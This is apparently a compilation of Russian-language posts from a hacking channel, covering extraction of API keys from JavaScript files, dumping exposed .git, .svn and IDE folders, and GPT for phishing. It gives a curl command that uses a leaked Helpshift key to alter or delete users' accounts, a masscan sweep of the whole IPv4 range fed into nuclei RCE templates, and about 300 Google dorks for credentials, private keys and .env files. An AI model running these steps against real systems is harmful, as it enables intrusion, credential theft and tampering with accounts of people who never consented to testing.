Если вы слишком ленивы, я предлагаю вам использовать этот инструмент, т.е. LinkFinder. Это инструмент для обнаружения конечных точек JS, написанный GerbenJavado. Вы можете найти его здесь, LinkFinder .

Но лично я предпочитаю делать это вручную. Потому что иногда автоматизированные инструменты оказываются бесполезными и пропускают некоторые важные вещи. Итак, приступим.

Фаза 1: извлечение файлов JS и их украшение:

1. Извлечь файлы JS из исходного кода redacted.com
2. Bash, который я использовал для извлечения файлов .js с помощью waybackurl :
   
   Extraction(){
waybackurl $1| grep -iE “\.js$” | uniq | sort
}

3. Для украшения кода JS я использовал js-beautify для красивого вывода кода js (довольно просто).

js-beautify <file.js> | tee -a <beautify.js>

Вы можете установить его по приведенной ниже ссылке:

https://www.npmjs.com/package/js-beautify

Фаза 2: Поиск шаблонов и конечных точек в файлах JS:

1. Это несколько шаблонов, которые я использую при чтении любого файла JS.

{api_key, api-key, apikey , api , access , AccessToken , gmap , gmaps , algolia_api_key , credentials, etc..}

2. Сопоставление конечных точек, которые вы нашли при чтении JS-файла. (важный)

3. Большинство охотников за ошибками пропускают второй пункт только потому, что они не могут наметить правильные конечные точки, что приводит к ошибкам безопасности высокой степени серьезности и теряет шансы получить ошибки высокой степени серьезности.

ПРИМЕЧАНИЕ. Прочитайте каждый путь и попробуйте сопоставить эти конечные точки, пока не добьетесь успеха. Потому что файл JS содержит все решения, связанные с сопоставлением конечных точек.

Этап 3. Поиск соответствующей документации:

1. Если вы нашли какой-либо ключ Rest-Api-Key, перейдите к его документации Api (поищите в Google соответствующие документы Api) и поймите, как он работает и как вы будете использовать его для получения доступа к целевой системе.
2. Keyhacks (это поможет вам для быстрой эксплуатации. Поскольку этот репозиторий содержит более 50 рабочих конечных точек различных ключей Rest-API).

Теперь давайте взглянем на мой раскрытый отчет, где я нашел HelpShift-Rest-Api-Key, с помощью которого я могу изменить содержимое учетных записей, а также я могу удалить учетные записи redacted.com.

Шаги для воспроизведения (в соответствии с отчетом):

Поиск ключа API:

1. Перейдите на « https://redacted.com/dist/main.7be5c75d761008c183e6.min.js ».
2. Анализируя код JS, вы найдете значение base64 в параметре HelfShiftApiKey.

Полная эксплуатация:

1. Перейдите на « https://apidocs.helpshift.com » и введите необходимые данные.
2. Вы получили Swagger API и успешно вошли в систему. Теперь делай все, что хочешь.

Примечание. Вы также можете использовать команду curl:

curl -X PUT — header ‘Content-Type: application/x-www-form-urlencoded’ — header ‘Accept: application/json’ — header ‘Authorization: Basic <base64_API_Key>’ -d ‘username=<username>’ ‘https://api-a.helpshift.com/v1/<domain_name>/users/<profile_id>'

вы можете получить все идентификаторы профиля из запроса getUser.

Наш канал - https://t.me/webhack_kakao

Скрытые файлы и директории, которые оставляют на веб сервере, могут иметь важную, конфиденциальную информацию. Веб-сервер может содержать много скрытой информации.
Такие файлы как:

• исходные коды версии системных папок и файлов (.git, .gitignore, .svn)
• файлы конфигурации (.npmrc, package.json, .htaccess)
• пользовательские файлы конфигурации (.json, .yml, .xml)
• и многое другое

Эти данные можно поделить на 3 группы:

1. Файлы конфигурации для IDE (Интегрированная среда разработки)
2. Исходный код системы контроля версий
3. Проекты и/или файлы конфигурации и настройки для конкретной технологии

Давайте взглянем на все это более детально, что бы узнать какую информацию можно от них ожидать

Исходный код системы контроля версий

Git

Git «является распределенной системой для управления версиями разрабатываемых файлов»

Недавно созданный Git-репозиторий содержит несколько папок и файлов по умолчанию, в которых хранится вся информация. Вот пример папки .git с уже сделанным комитом:

Все данные хранятся в .git. Эти данные можно поделить на 3 вида: комиты, каталоги файлов либо «Tree», и блобы «Blob»

1. Комит — хранит информацию с текущими хэшами каталогов файлов

2. Tree — содержит информацию о структуре папок и файлов - и каждая отдельная папка или файл имеет свой собственный хэш объекта, хранящийся в объекте каталогов файлов. Это может быть другой каталог(папка на один уровень ниже в структуре папок) или файл.

3. Blob - это объект Git типа, в котором сохраняется содержимое файлов.

Если все же .git папка встретиться на веб сервере, есть легкий путь для получения содержания любого файла — просто скачав и прочив Git объекты. Если повезет, можно скопировать репозиторий используя команду git clone, либо использовать wget с -r опцией. Но иногда все не так просто…

Давайте рассмотрим ситуацию, когда ни один из этих вариантов не выполняется успешно

Что бы убедиться о наличии .git папки на веб сервере, нужно проверить получения HTTP 403 ответа (если 404 — запрашиваемая папка не найдена).

Отражение файлов и папок используя локальную Git репозиторий

Что бы сделать это, стоит создать свою простенькую .git репозиторий с внутренней структурой и скачать Git объекты с веб сервера

Прежде всего, создания репозитория:

$ git init

Эта команда инициализирует пустую Git репозиторий с всеми необходимыми файлами и папками.

Получение и прочтение информации об объектах

Для получения информации о Git репозитории, сперва нужно выяснить стартовую точку. Git сохраняет всю информацию в лог файле, и этот файл доступен в .git/logs/head

Если .git/logs/head не работает, но .git возвращает 403, то нужно попробовать .git/logs/HEAD

Проанализируем внимательнее на строку из файла:

0000000000000000000000000000000000000000 07603070376d63d911f608120eb4b5489b507592 test@gmail.com <test@gmail.com> 1452195279 +0000 commit (initial);

Первые 2 строки являются хэшами объектов, и именно это нам нужно. Так как это самый первый комит, первый хэш имеет только нули (так как предыдущего нет), второй в свою очередь имеет информацию о предыдущем.

Первым делом нужно создать действующий путь к объекту. Путь содержит общий путь ко всем объектам в хранилище, то есть к .git/objects, за которым следуют две части, построенные из хэша - имя каталога (первые два символа хэша) и имя файла (остальная часть хэша, начиная с третьего символа). Таким образом, чтобы получить объект, идентифицированный по хэшу 07603070376d63d911f608120eb4b5489b507592, нужно открыть следующий URL:

localhost/testapp/.git/objects/07/603070376d63d911f608120eb4b5489b507692

И скачивается файл:

Скачанный файл можно увидеть в своей «простой» Git папке:

vasha_prostaya_git_papka/.git/objects/07/603070376d63d911f608120eb4b5489b507692

Команда git cat-gile -t поможет узнать тип объекта:

$ git cat-file -t <хэш>

Что бы отобразить содержание файла, нужно прописать следующую команду:

$ git cat-file -p <хэш>

Теперь можно проверить тип, и прочитать содержание файла, который был сохранен ранее:

При прочтении содержания, можно найти информацию о нынешнем хэше из каталога объектов:

Как вы можете заметить, только index.php остался в папке, также я уже узнал хэш объекта и его тип, который является blob. И это то что нам нужно, для просмотра содержания файла, используя все тот же метод, который до этого я использовал для чтения содержимого комита и объектов каталога (но прежде всего, нужно скачать объект с веб-сервера, как было описано выше):

Так же стоит запомнить, что данное содержание index.php показано такое же, какое оно было при создании комита описанным объектом 07603070376d63d911f608120eb4b5489b507692. Если вы взглянете в файл логов, вы сможете заметить второй комит (идентифицирован хэшем объекта 4db7a14eee2cd3ff529278b75e1653e677fe1d02) и это последний комит, он содержит последние изменения и из-за этого нынешний index.php будет отличаться от предыдущего index.php:

PHP:

<?php
echo "Hello World!";

$i = 100;
echo "Value of i is $i";

Так как ручной перебор объектов мучительный и нудный, в сетях можно найти автоматизированные скрипты, вот например - тык

.gitignore файл

Есть так же одна вещь, которую стоит описать, если вы нашли .git папку оставленную на веб-сервере, а именно - .gitgnore. Цель таких файлов проста — это место где можно положить имена всех папок и файлов который не стоит комитеть в репозиторий. По этому это самый легкий путь найти файлы, которые по каким-то причинам не должны быть закомиченны:

Subversion (SVN)

Subversion (или SVN) это система контроли системы создана Apache Software Foundation и эта система остается очень популярной и широко используемой.

Пример структуры SVN папок и файлов:

На мой взгляд, wc.db является самым важным файлом базы данных SQLite, pristine/ так же имеет ценную информацию. В wc.db можно найти хэши используемые в pristine/, поэтому стоит начать именно отсюда

Что бы получить информацию из Subversion, прежде всего, нужно убедиться, что нам доступен wc.db. А именно: открыть следующую ссылку в веб-браузере:

http://server/path_to_site/.svn/wc.db

Если выскочило уведомление о загрузке — обозначает, что есть шанс, что остальные .svn файлы будут находиться здесь. Сперва, нужно прочитать содержание wc.db что бы получить информацию о хэшах файлов.

Что бы прочитать wc.db файл, можно воспользоваться SQLite утилитой:

Код:

$ sqlite3 wc.db
SQLite version 3.8.10.2 2015-05-20 18:17:19
Enter ".help" for usage hints.

sqlite> .databases
seq  name             file                                                     
---  ---------------  ----------------------------------------------------------
0    main             /Users/test/wc.db   

sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE REPOSITORY (   id INTEGER PRIMARY KEY AUTOINCREMENT,   root  TEXT UNIQUE NOT NULL,   uuid  TEXT NOT NULL   );
INSERT INTO "REPOSITORY" VALUES(1,'svn+ssh://192.168.1.4/var/svn-repos/project_wombat','88dcec91-39c3-4b86-8627-702dd82cfa09');
(...)
INSERT INTO "NODES" VALUES(1,'trunk',0,'',1,'trunk',1,'normal',NULL,NULL,'dir',X'2829','infinity',NULL,NULL,1,1456055578790922,'bl4de',NULL,NULL,NULL,NULL);
INSERT INTO "NODES" VALUES(1,'',0,NULL,1,'',1,'normal',NULL,NULL,'dir',X'2829','infinity',NULL,NULL,1,1456055578790922,'bl4de',NULL,NULL,NULL,NULL);
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
INSERT INTO "NODES" VALUES(1,'trunk/test2.txt',0,'trunk',1,'trunk/test2.txt',3,'normal',NULL,NULL,'file',NULL,NULL,'$sha1$6f3fb98418f14f293f7ad55e2cc468ba692b23ce',NULL,3,1456056740296578,'bl4de',27,1456056696000000,NULL,NULL);
(...)

Заметили операции INSERT в таблицу NODES? Каждая из этих операций содержит имя файла и SHA1 хэш, который отвечает записке в pristine/:

Код:

$ ls -lA pristine/94/
total 8
-rw-r--r--@ 1 sor staff  38 Feb 31 12:05 945a60e68acc693fcb74abadb588aac1a9135f62.svn-base

Что бы отобразить значения из NODES в имя файла, нужно выполнить несколько команд:

• удалить префикс $sha1$
• добавить постфикс .svn-base
• использовать первые два знака как имя папки внутри директории pristine/ (в этом случае это 94)
• создать полный путь, который в этом примере будет:

http://server/path_to_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base

При открытии ссылки, нужно будет скачать файл или отобразить содержание прямо в файле:

Так же, запись в таблице REPOSITORIES указывает на настоящий путь в репозиторий, который является:

svn+ssh://192.168.1.4/var/svn-repos/project_wombat

В данной ссылке содержится много информации. Оставляя папку .svn на веб-сервере может быть огромной ошибкой. Это может даже обозначать полную компрометацию исходного кода веб-приложения.

Так же много информации в себе хранят файлы проектов IDE:

IDE (интегрированные среды разработки) используется многими программистами, для хранения настройки проектов, куча дополнительной информации в их собственных файлах. Если такая папка лежит на веб-сервере — это уже другой источник информации о этом веб-сервере.

Например, возьмем приложения JetBrains IDEs : IntelliJ IDEA, WebStorm, PHPStorm, RubyMine

Каждый проект, в каждой продукции JetBrains, создает собственные скрытые директории - .idea/.
Эти директории содержат всю информацию о нынешних проектах, их файлов, другие директории и IDE настройки.

Один из этих файлов, является очень важным с точки зрения безопасности — workspace.xml.
Этот файл содержит много ценной информации, которая позволяет перечислить все файлы и папки приложения, информацию о системе контроля версии и многое другое.

Давайте рассмотрим, что именно хранит этот файл:

XML:

<?xml version="1.0" encoding="UTF-8"?>
    (...)
    <component name="FileEditorManager">
        <leaf>
          <file leaf-file-name="README.md" pinned="false" current-in-tab="false">
            <entry file="file://$PROJECT_DIR$/README.md">
                (...)
    </component>
(...)

Все узлы в component name=”FileEditorManager” содержат все файлы и их пути. Проще говоря — это просто результат команды ls выполненной в основной папке проекта, и завернутой в XML.

Если присмотреться к каждому component’у узла, можно найти информацию про использование системы контроля версии, например:

XML:

<component name="Git.Settings">
    <option name="UPDATE_TYPE" value="MERGE" />
    <option name="RECENT_GIT_ROOT_PATH" value="$PROJECT_DIR$" />
  </component>

Так же, тут много информации про комиты и остальные задачи, которые выполняются в узле component name=”TaskManager”:

XML:

<task id="LOCAL-00211" summary="change WebSocket port to 1099">
      <created>1436206418000</created>
      <option name="number" value="00211" />
      <option name="project" value="LOCAL" />
      <updated>1436206418000</updated>
    </task>

Другая интересная информация может находиться в изменении истории, записана в узел component name=”ChangeListManager”:

XML:

<component name="ChangeListManager">
                (...)
                <change type="DELETED" beforePath="$PROJECT_DIR$/chat/node_modules/socket.io/node_modules/socket.io-adapter/node_modules/debug/Makefile" afterPath="" />
                (...)
        </component>

так же хорошо, как и в узле component name="editorHistoryManager":

XML:

<entry file="file://$PROJECT_DIR$/public_html/vendor/angular/angular.js">
      <provider selected="true" editor-type-id="text-editor">
        <state vertical-scroll-proportion="0.0">
          <caret line="3233" column="29" selection-start-line="3233" selection-start-column="29" selection-end-line="3233" selection-end-column="29" />
        </state>
      </provider>
    </entry>

Если программист управлял дата базой интегрированным менеджером DB, значит там находятся другие интересные файлы: dataSources.ids (в этом файле находиться структура базы данных), dataSource.xml, dataSources.xml, dataSources.local.xml и dbnavigator.xml содержат примерно такую информацию:

XML:

<database>
          <name value="database_name" />
          <description value="" />
          <database-type value="MYSQL" />
          <config-type value="BASIC" />
          <database-version value="5.7" />
          <driver-source value="BUILTIN" />
          <driver-library value="" />
          <driver value="" />
          <host value="localhost" />
          <port value="3306" />
          <database value="mywebapp" />
          <url-type value="DATABASE" />
          <os-authentication value="false" />
          <empty-password value="false" />
          <user value="root" />
          <password value="gh7sdQ==" />   <!-- Base64 encoded -->
        </database>

Или даже больше, как например файл dataSources.local.xml:

XML:

<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
  <component name="dataSourceStorageLocal">
    <data-source name="MySQL - mywebapp@localhost" uuid="8681098b-fc96-4258-8b4f-bfbd00012e2b">
      <secret-storage>master_key</secret-storage>
      <user-name>root</user-name>
      <schema-pattern>mywebapp.*</schema-pattern>
      <default-schemas>mywebapp.*</default-schemas>
    </data-source>
  </component>
</project>

Все зависит от самого проекта, и использования определенных IDE плагинов (к примеру, дебагер, система контроля версии или менеджер базы данных). Как вывод, стоит тщательно осматривать каждый узел component.

Как вы можете заметить, это очень интересный кладезь информации. Я предлагаю вам скачать любую продукцию JetBrains IDE, далее создать проект и добавить пару папок и файлов, после этого попробуйте управлять Git или SVN. Так же создайте простую базу данных, и управляйте ею при помощи Database Manager. После всего этого, в .idea/ вы найдете очень много интересной информации.

NetBeans IDE
NetBeans другая популярная и бесплатная IDE для JAVA, C/C++, PHP, HTML5 и JavaScript разработки.

NetBeans создает свою собственную скрытую папку в папке проекты, где содержит всю нужную информацию и настройки — nbprosect/ (стоит отметить, что папка имеет схожую функцию со скрытыми папками продукции JetBrains IDEs)

В скрытой папке, вы сможете найти project.xml. Данный файл является отличным стартом для постижения конфигурации NetBeans проекта.

Способ изучения информации в скрытой папке очень похож с раннее описанными методами. Поэтому, я не буду детально на этом останавливаться.

Разные файлы конфигурации

Спецификация файлов конфигурации NodeJS/JavaScript

Если вы сталкивались с современными постройками JavaScript проектов, скорее всего вы были удивлены, насколько много файлов имеют *.json и .rc* в папке/папках проекта.

В папках проекта храниться много файлов конфигурации которые похожи на эти, и содержать в себе много информации о использованных библиотеках. Некоторые директории не доступны прямо из веб-браузера или вообще невозможно их обнаружить инструментами для обнаружения скрытых папок и файлов, но все же, некоторые из этих файлов можно встретить повсюду.

Примерами являются файлы конфигурации npm (package.json, package-lock.json), которые содержат все зависимости приложения. Так же примером являются файлы linters для JavaScript, таких менеджеров как ESlint, JShint или Bower - bower.json.

Давайте взглянем на простой bower.json файл, который содержит конфигурации для Bower и имеет список пакетов использованных в веб-приложении (для фронтенда):

JSON:

{
  "name": "testapp",
  "version": "2.1.0",
  "description": "test application",
  "main": "index.html",
  "moduleType": [
    "globals"
  ],
  "license": "MIT",
  "dependencies": {
    "angular": "1.4",
    "pure": "~0.5.0",
    "angular-route": "~1.2.26",
    "angular-ui-router": "~0.2.11",
    "angular-bootstrap-datetimepicker": "latest",
    "angular-translate": "~2.6.1"
  },
  "devDependencies": {}
}

Больше интересных вещей со стороны безопасности является файл Node.js или io.js бэкенд приложение - package.json.

Если вы сможете скачать package.json с сервера, то этот простой метод по идентифицированию любых потенциальных npm пакетов использованных в приложении вам поможет:

• убедитесь, что у вас установлен NodeJS, с npm версии 6, или выше
• сохраните скачанный пакет (package.json в нашем случае) и запустите следующей командой в той же директории, где вы сохранили данный пакет:
  $ npm install
• в конце, вы получите подобную информацию:

Код:

audited 9307 packages in 8.417s
found 9 vulnerabilities (4 low, 1 moderate, 4 high)
run `npm audit fix` to fix them, or `npm audit` for details

• теперь запустите команду npm аудита:
  $ npm audit
• после этого, команда выдаст вам отчет, который содержит все уязвимости, найденные аудитом:

Код:

                       === npm audit security report ===                     
                                                                              
# Run  npm install gulp@4.0.0  to resolve 5 vulnerabilities
SEMVER WARNING: Recommended action is a potentially breaking change
┌───────────────┬──────────────────────────────────────────────────────────────┐
│ High          │ Regular Expression Denial of Service                         │
├───────────────┼──────────────────────────────────────────────────────────────┤
│ Package       │ minimatch                                                    │
├───────────────┼──────────────────────────────────────────────────────────────┤
│ Dependency of │ gulp                                                         │
├───────────────┼──────────────────────────────────────────────────────────────┤
│ Path          │ gulp > vinyl-fs > glob-stream > glob > minimatch             │
├───────────────┼──────────────────────────────────────────────────────────────┤
│ More info     │ https://nodesecurity.io/advisories/118                       │
└───────────────┴──────────────────────────────────────────────────────────────┘

(...more dtails about every vulnerability...)


found 9 vulnerabilities (4 low, 1 moderate, 4 high) in 9307 scanned packages
  run `npm audit fix` to fix 1 of them.
  6 vulnerabilities require semver-major dependency updates.
  2 vulnerabilities require manual review. See the full report for details.

Хорошей идеей будет сохранить отчет в отдельном файле, так как иногда вы обнаружите сотни слабых мест в нескольких модулях npm. Важно не попасться в “кроличью нору” - некоторые из этих проблем носят скорее теоретический, нежели практический характер, иногда модули могут даже не использоваться проектом.

Вот к примеру простой файл package.json демонстрирует что, возможно в проекте используется база данных MySQL и несколько клиент-серверов связаны друг с другом при помощи WebSockets:

JSON:

{
  "name": "Test",
  "version": "1.0.0",
  "dependencies": {
    "socket.io": "^1.3.5",
    "mysql": "^2.9.0"
  }
}

Этот вид информации позволяет вам понять, что стараться внедрить популярные NoSQL инъекции - не лучшая идея, из-за того, что приложение использует стандартную базу данных SQL и может быть вам лучше проверить, поддается ли приложение к SQL инъекции.

Также есть файлы вроде .bowerrc, .eslintrc, .jshintrc и похожие. Даже если они не содержат много “чувствительной” информации, всегда есть шанс, что вы сможете найти описания об архитектуре веб-приложения, о использованных библиотеках или/и фреймворков. Всегда нужно заглянуть в файл, ведь мало что могут содержать в себе комментарии...

Вывод:

Под плохой защитой, скрытые файлы и папки на веб-сервере дают хакеру много полезной и ценной информации, которую он сможет использовать для атаки на тот же веб-сервер. Поэтому, всегда удаляйте скрытые папки от IDE, Git’a и прочих приложений перед загрузкой проекта на веб-сервер.

Спасибо за внимание!

Наш канал - https://t.me/webhack_kakao

И так начнем! Подключаемся к своему VPS удобным для вас способом...
Подключились - теперь нам необходимо установить GO версии 1.19 как рекомендует разработчик софта.

Приступим

sudo apt-get update
sudo apt-get -y upgrade

wget https://go.dev/dl/go1.19.linux-amd64.tar.gz

tar -xvf go1.19.linux-amd64.tar.gz
sudo mv go /usr/local

export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

С установкой GO разобрались, приступаем к установке nuclei

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

После завершения установки на всякий случай обновим базу шаблонов.

nuclei -update-templates

Немного информации о nuclei

Nuclei - это инструмент, используемый для сканирования веб-приложений и служб на предмет потенциальных уязвимостей. Он использует шаблоны, написанные на YAML, для выявления различных типов уязвимостей и может быть настроен для конкретных случаев использования, таких как XSS, SQL injection, RCE. Он также поддерживает применение фильтров и исключение целевых объектов, что делает его универсальным и мощным инструментом для поиска уязвимостей.

Посмотрим все доступные шаблоны, перейдя в каталог nuclei-templates (тоже самое можно проделать посетив оффициальную страницу шаблонов nuclei на Github)

ls ~/nuclei-templates/

Теперь отсортируем темплы по ключевым словам внутри YAML шаблонов, ниже приведен пример команды для копирования шаблонов содержащих ключевое слово RCE из дефолтной директории nuclei /nuclei-templates/ в созданую вами ранее директорию.

grep -rl 'remote.*code.*execution' ~/nuclei-templates/ | xargs cp -t /home/user/nuc/RCE/

Немного отступим от темы сканера nuclei и займемся формированием списка адресов для тестирования, в этом нам поможет masscan.

masscan -p443 --rate 1300000 --ranges 0.0.0.0-255.255.255.255 --output-format list --output-file test.txt --open-only --randomize-hosts --exclude 255.255.255.255 -v --send-eth --

nuclei принимает листы целей в таком формате [ https://host_ip_(domain) ] так, что нормализуем вывод masscan к нужному nuclei формату.

awk '{ print "https://" $4 ":" $3 }' test.txt > https_test.txt

На выходе имеем файл содержащий строки https://ip:port

Запускаем nuclei

Вариант запуска с заранее подготовленной директорией шаблонов сосредоточенных на поиск RCE.

nuclei  -l <https_test.txt> -t /home/user/nuc/RCE/ -o good.txt

Вариант запуска с использованием одного шаблона.

nuclei  -l <https_test.txt> -t /home/user/nuc/RCE/CVE-2009-1151.yaml -o good.txt

Дожидаемся момента завершения работы сканера и welcome good.txt смотреть, что же мы насобирали.

Наш канал - https://t.me/webhack_kakao

Cognitio - это инструмент на основе машинного обучения, предназначенный для выявления уязвимостей в веб-приложениях. Он анализирует поведение приложений и сетевой трафик для обнаружения атак и подозрительной активности.
—————————————————————————————————————

Deep Exploit - это автоматизированный инструмент тестирования на проникновение, который использует искусственный интеллект для выявления уязвимостей в сетях и приложениях. Он способен проводить широкий спектр атак, включая разведку, перебор и атаки с переполнением буфера.
—————————————————————————————————————

AI Hunter - это инструмент с открытым исходным кодом, который использует машинное обучение для обнаружения вредоносного ПО и других угроз. Он анализирует сетевой трафик и выявляет закономерности, которые могут указывать на атаку.
—————————————————————————————————————

Canary - это платформа обмана на основе ИИ, которая создает поддельные активы в сети, чтобы заманить злоумышленников. Когда злоумышленник взаимодействует с обманкой, Canary отправляет сигнал тревоги команде безопасности.
—————————————————————————————————————

ReversingLabs - это платформа для анализа угроз, которая использует искусственный интеллект для анализа вредоносного ПО и других угроз. Она предоставляет подробные отчеты об угрозах, включая информацию об их поведении и потенциальном воздействии.
—————————————————————————————————————

Darktrace - это платформа сетевой безопасности на базе ИИ, использующая машинное обучение для обнаружения и реагирования на угрозы в режиме реального времени. Она анализирует сетевой трафик и поведение пользователей для выявления подозрительной активности.
—————————————————————————————————————

Attivo Networks - это платформа безопасности на основе обмана, которая использует искусственный интеллект для создания ложных целей в сети. Когда злоумышленник взаимодействует с приманкой, платформа отправляет сигнал тревоги команде безопасности.
—————————————————————————————————————

OpenAI GPT-3/4 - это языковая модель на основе ИИ, которая может использоваться для создания убедительных фишинговых писем и других социально-инженерных атак. Команды "красных" могут использовать GPT-3 для создания высокоцелевых и убедительных атак.
—————————————————————————————————————

Binary Ninja - это инструмент реверс-инжиниринга на базе ИИ, который помогает группам специалистов анализировать и понимать двоичный код. Он предоставляет ряд функций, включая разборку и декомпиляцию, для выявления уязвимостей и эксплойтов.
—————————————————————————————————————

HYPR - это платформа аутентификации на основе искусственного интеллекта, использующая биометрические данные для аутентификации пользователей. Она использует машинное обучение для обнаружения и предотвращения мошеннических попыток входа в систему, снижая риск компрометации учетной записи.

—————————————————————————————————————

Наш канал - https://t.me/webhack_kakao

300 Google Dorks (2022-2023)
intitle:"index of" "download.php?file="
intitle:"index of "phpunit.yml"
inurl:"wp-content" intitle:"index.of" intext:wp-config.php
intext:"index of" inurl:json-rpc
intext:"index of" inurl:jwks-rsa
inurl:"wp-content" intitle:"index.of" intext:backup"
intitle:"index of" "users.yml" | "admin.yml" | "config.yml"
intitle:index.of conf.mysql
inurl: "/wp-content/uploads"
intitle:"index of" "docker-compose.yml"
intext:pom.xml intitle:"index of /"
intext:"Index of" intext:"backup.tar"
intext:"Index of" intext:"backend/"
Index of" intext:"source_code.zip
intext:"Index of" intext:"/etc"
intext:"Index of" intext:"bitbucket-pipelines.yml"
intext:"Index of" intext:"plugin/"
intext:"Index of" intext:"backup.tar"
intitle: index of /phpMyAdmin/index.php
intitle:"index of" "config.php"
inurl:"/private" intext:"index of /" "config"
intitle:"index of" "properties.json"
inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
intitle:"index of " "config/db"
inurl:"/private" intext:"index of /" inurl:"owncloud" -litespeed
inurl:"/private" intext:"index of /" "win64" -litespeed
intitle:"index of /" "styleci.yml" ".env"
inurl:":8080/" intext:"index of /" "win64" -LiteSpeed
inurl:".ir/" intext:"index of /" ".ovpn"
inurl:*/signIn.do
index of: admin.json
intitle:"index of /" "public.zip"
intitle:"index of /" "docker-compose.yml" ".env"
inurl:*/signIn.do
intext:"index of" downloads" site:*.*
inurl:"/scada-vis"
intitle:"index of /" ".apk" inurl:".ir/"
intitle:'Sypex Dumper" inurl:sxd
intitle:"index of /" "admin.zip" "admin/"
index of conf.bak
intitle:"index of " "shell.txt"
intitle:index of django/admin site:.*
intitle:"index of "conf.json"
intitle:"index of "application.yml"
allintitle:"VidyoRouter Configuration"
intitle:"Index of" site:.bd
intitle:"index of" inurl:admin/php
inurl:login/login
site:.com intitle:index of /wp-admin
intitle:"index of" "checkout"
inurl:"/api-docs"
inurl: "phpmyadmin/setup/"
inurl:ssh intitle:index of /files
site:.in intext:"Index of" intitle:"index of"
intitle:"index of" inurl:wp-json index.json
intitle:"index of" "database.sql"
intext:"index of" "wp-content.zip"
intext:"index of" smb.conf
inurl:robots filetype:txt
intitle:index of wp-content/plugins/wp-mail-smtp/
intitle:"index of" inurl:admin/login
intitle:"index.of" *S3
intitle:"index of" /etc/shadow
intext: "index of" "wp-config.php.bak"
allintitle:"ProjectDox Login"
intitle:"index of" intext:user inurl:data
intitle:"Index of /cam/"
index of:admin.asp
intext:"index of" "config"
Index of:admin site:*.com
inurl:backup filetype:sql
intitle:"index of /" intext:".db
intext:phpMiniAdmin inurl:phpminiadmin ext:phpIndex:Index of /wp-admin
inurl:"/wp-content/plugins/imagemagick-engine/"
intitle:"index of" intext:"Apache/1.4"
intitle:index.of intext:log inurl:nasa
intext:"index of" "backuop/*.sql"
intitle:"index of" "admin" "cgi-bin"
intitle:index of "wc.db"
intitle: index of /secrets/
inurl: wp-content/plugin/8-degree-notification-bar
inurl: wp-content/plugin/404-redirection-manager
intitle:BioTime AND intext:ZKTeco Security LLC
intext:"index of" "xmlrpc.php"
intext:"index of" ".git"
intext:"index of" ".git"
intext:"index of" "phpinfo"
intitle:"Oracle WebLogic Server"
site:investor.*.* AND inurl:home/default.aspx
inurl: administrator/components/com_admin/sql/updates/sqlazure
inurl: administrator/components/com_admin/sql/updates/mysql/
inurl: administrator/components
intitle:"index of /database/migrations"
intitle:"Index of /webcam/"
inurl index.php id= site.bdintitle:"WAMPSERVER Homepage"
inurl: json beautifier online
intitle:"index of" intext:"Apache/2.2.3"
intitle:"index of" inurl:superadmin
intext:"index of" ".sql"
intitle:"index of" inurl:SUID
inurl:/sym404/root
filetype:reg [HKEY_USERSDEFAULT]
intitle: "index of" intext: human resources
intitle:"index of"|"access_token.json"
inurl: /wp-includes/uploads
intitle:"index of" "release.sh"
intitle:"index of" "configure.sh"
intext:"index of" "upi" "wp-content"
intitle:"index of" "after.sh"
intitle:"index of" "setup.sh"
intitle:"index of" "deploy.sh"
intext:"index of" ".html"
intext:"sign up" "**" filetype:php
intitle:"index of smtp"
intitle:"index of" "cookies" "php"
intext:"index of" "httpclient" "login"
intitle:" TROJANS" Analysis Report
intext:"index of" "phonepe" "wp-content"
intext:"index of" "transaction"
intext:"index of" ".html"
intext:"index of" "repository"
intext:"index of" "ipaddress"
intitle:"index of" "cron.sh"
index of:"backtrack" "hack" ext:php
intitle:"index of /" intext:".env"
intitle:"bugs" Analysis Report
inurl:/admin ext:config
intext:"index of /" "server at"
inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
intitle:"index of" "db.py"intitle: index of "awstats"
intitle:"index of "cloud-config.yml"
intitle:"index of" "private_key.pem"
intitle:"Index of /" inurl:(resume|cv)
intitle:"index of" ("passenger.*.log" | "passenger.log" | | "production.log" )
index of /wp-admin.zip
intitle:"index of" /gscloud
intitle:"index of" aws/
intitle:"index of" include/
intitle:"index of" "catalina.out"
site:.com intitle:"index of" /ipa
intitle:"index of" "keystore.jks"
site:.com intitle:"index of" /paypal
22site:*.com "index of" error_logs
site:cloudfront.net inurl:d
site:amazonaws.com inurl:elb.amazonaws.com
intitle:index of "error_log"
site:.com intitle:"index of" /payments.txt
intitle:"index of "docker-compose.yml"
intitle:"index of" "java.log" | "java.logs"
intext:"token" filetype:log "authenticate"
inurl: document/d intext: ssnintitle:"login" intext:"authorized users only"
inurl:/_vti_bin/ ext:asmx
intitle:"index of" "printenv.pl
inurl:/_layouts "[To Parent Directory]"
intitle:index of ./jira-software
intitle:"index of" " *config.php "
inurl:.com index of apks
intitle:index of "aws/credentials"
intitle:"index of" " admin.php "
site:com.* intitle:"index of" *.admin
ext:java intext:"import org.apache.logging.log4j.Logger;"
site:com.* intitle:"index of" *.admin.password
inurl:wp-content/plugins/reflex-gallery/
intext:"SQL" && "DB" inurl:"/runtime/log/"
intitle:index of /backup private
index of "fileadmin/php"
intitle:"index of" " wp-includes "
site:gov.* intitle:"index of" *.xls
inurl:/login/index.jsp -site:hertz.*
inurl:.com index of apks
site:com.* intitle:"index of" *.sql
site:com.* intitle:"index of" *shell.php
"index of" filetype:db
site:gov.* intitle:"index of" *.xls
intitle:"index of" " wp-includes "site:com.* intitle:"index of" *.db
inurl:*org intitle:"index of" "docker-compose"
index of "fileadmin/php"
inurl:wp-content/plugins/reflex-gallery/
intitle:"index of" "wp-upload"
intitle:"index of" ".env" OR "pass"
site:gov intitle:"index of" *.data
intitle:index of "aws/credentials"
"index of" filetype:env
site:.edu intext:"index of" "shell"
site:com.* intitle:"index of" *.admin.password
intitle:"index of" " *config.php "
